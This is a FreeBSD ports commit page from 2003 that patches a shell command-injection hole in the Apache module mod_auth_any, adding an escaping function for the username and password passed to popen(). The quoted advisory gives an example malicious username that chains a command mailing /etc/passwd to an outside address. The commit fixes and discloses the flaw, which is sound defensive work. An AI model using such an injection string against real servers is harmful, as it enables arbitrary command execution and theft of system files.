diff options
author | lioux <lioux@FreeBSD.org> | 2003-03-25 12:23:11 +0800 |
---|---|---|
committer | lioux <lioux@FreeBSD.org> | 2003-03-25 12:23:11 +0800 |
commit | 7b631076c8227f5ca99d8780429699518f8201b9 (patch) | |
tree | ba299820ba1d1d7076928347242e06580e143aa2 | |
parent | 2dc1f72ac69c40b582c646e0da1ede2a2cf94188 (diff) | |
download | freebsd-ports-graphics-7b631076c8227f5ca99d8780429699518f8201b9.tar.gz freebsd-ports-graphics-7b631076c8227f5ca99d8780429699518f8201b9.tar.zst freebsd-ports-graphics-7b631076c8227f5ca99d8780429699518f8201b9.zip |
o Fix vulnerability that allows execution of arbitrary commands on
the server with the uid of the apache process. Background [1]:
"The module accepts a username and password from the web client,
passes them to a user-space executable (using popen(3), which invokes
a shell) and waits for a response in order to authenticate the user.
The password is quoted on the popen() command line to avoid
interpretation of shell special chars, but the username is not.
Thus a malicious user can execute commands by supplying an appropriately
crafted username. (e.g. "foo&mail me@my.home</etc/passwd")
"The problem is easily fixed by adding quotes (and escaping any
quotes already present) to the username and password in the popen
command line."
o Fix this by adding a escaping function from [2]. Then, modifying
this function appropriately with ideas from [3]. Apply the new
escaping code to mod_auth_any.
o Bump PORTREVISION
Submitted by: Security Officer (nectar),
Red Hat Security Response Team <security@redhat.com> [1]
Obtained from: mod_auth_any CVS [2],
nalin@redhat.com [3]
-rw-r--r-- | www/mod_auth_any/Makefile | 5 | ||||
-rw-r--r-- | www/mod_auth_any/files/bash_single_quote_escape_string.c | 45 | ||||
-rw-r--r-- | www/mod_auth_any/files/patch-mod_auth_any.c | 37 |
3 files changed, 87 insertions, 0 deletions
diff --git a/www/mod_auth_any/Makefile b/www/mod_auth_any/Makefile index 9616135cb8f..50a0c52c202 100644 --- a/www/mod_auth_any/Makefile +++ b/www/mod_auth_any/Makefile @@ -7,6 +7,7 @@ PORTNAME= mod_auth_any PORTVERSION= 1.0.2 +PORTREVISION= 1 CATEGORIES= www MASTER_SITES= ftp://ftp.itlab.musc.edu/pub/toolbox/mod_auth_any/ EXTRACT_SUFX= .tgz @@ -20,6 +21,10 @@ RUN_DEPENDS= ${APXS}:${APACHE_PORT} APXS?= ${LOCALBASE}/sbin/apxs APACHE_PORT?= ${PORTSDIR}/www/apache13 +post-patch: + @${CAT} ${FILESDIR}/bash_single_quote_escape_string.c >> \ + ${WRKSRC}/${PORTNAME}.c + do-build: @cd ${WRKSRC} && ${APXS} -c ${PORTNAME}.c diff --git a/www/mod_auth_any/files/bash_single_quote_escape_string.c b/www/mod_auth_any/files/bash_single_quote_escape_string.c new file mode 100644 index 00000000000..439b205c442 --- /dev/null +++ b/www/mod_auth_any/files/bash_single_quote_escape_string.c @@ -0,0 +1,45 @@ +/* Escape special characters in the input string so that the bash + shell will not interpolate them when the input string is withing + single quotes. + + IN: null-terminated character array containing string to be interpolated + OUT: newly allocate (using malloc) null-terminated character array + containing the input string with the special characters properly + escaped */ +char* bash_single_quote_escape_string(const char *s) { + /* used to count the length of the string and the number of single quotes */ + int str_len, sq_count; + int s_pos, buf_pos; /* copy chars loop counter */ + /* used to hold the final result string */ + char *buf; + const char *escapees = "\"'\\$~` \t|&;()<>"; + + /* Count the single quotes. + LOOP INVARIANT: str_len < (number of chars in string 's') + POSTCONDITION: sq_count == (number of single quotes in string 's') */ + for (str_len = 0, sq_count = 0; s[str_len] != '\0'; str_len++) + if (strchr(escapees, s[str_len]) != NULL) + sq_count++; + + /* Allocate the memory for the final string. + Each ' (one char) will become \' (2 chars), so multiply by 2 + and don't forget to add 1 for terminating null. */ + buf = (char*) malloc(sizeof(char) * (str_len + 1 + sq_count * 2)); + + /* Copy the chars of 's' into 'buf', turning each ' into \' */ + for (s_pos = 0, buf_pos = 0; s_pos < str_len; s_pos++) { + /* If we see a single quote, then put '\'' into 'buf' and advance + buf_pos 4 positions, else put the next char from 's' into 'buf' + and advance buf_pos 1 position. */ + if(strchr(escapees, s[s_pos]) != NULL) { + buf[buf_pos++] = '\\'; + buf[buf_pos++] = s[s_pos]; + } else { + buf[buf_pos++] = s[s_pos]; + } + } + /* don't forget the null terminator */ + buf[buf_pos] = '\0'; + + return buf; +} diff --git a/www/mod_auth_any/files/patch-mod_auth_any.c b/www/mod_auth_any/files/patch-mod_auth_any.c new file mode 100644 index 00000000000..e234b8517b1 --- /dev/null +++ b/www/mod_auth_any/files/patch-mod_auth_any.c @@ -0,0 +1,37 @@ +--- mod_auth_any.c.orig Tue Jan 9 05:48:20 2001 ++++ mod_auth_any.c Tue Mar 25 01:09:55 2003 +@@ -121,6 +121,7 @@ + + */ + ++char* bash_single_quote_escape_string(const char *); + + /* NB: debugging stuff */ + extern int errno; +@@ -180,13 +181,25 @@ + const char *rpw, *w; + FILE* ext_authprog; + FILE* fp; ++ char *escaped_user, *escaped_password; + + l = (char*) malloc (MAX_STRING_LEN * sizeof(char)); ++ memset (l, '\0', MAX_STRING_LEN); + execstr = (char*) malloc (MAX_STRING_LEN * sizeof(char)); + + setenv ("REMOTE_ADDR", r -> connection -> remote_ip, 1); ++ ++ /* escape the user name and the password */ ++ escaped_user = bash_single_quote_escape_string(user); ++ escaped_password = bash_single_quote_escape_string(password); ++ + /* open the program stream */ +- snprintf (execstr, MAX_STRING_LEN, "%s %s \"%s\"", auth_pwfile, user, password); ++ snprintf (execstr, MAX_STRING_LEN, "%s %s %s", auth_pwfile, escaped_user, escaped_password); ++ ++ /* free the escaped user and password before we forget */ ++ free(escaped_user); ++ free(escaped_password); ++ + if (!(ext_authprog = popen (execstr, "r"))) { + + ap_log_rerror (APLOG_MARK, APLOG_ERR, r, "Could not popen() on program: %s: %s", |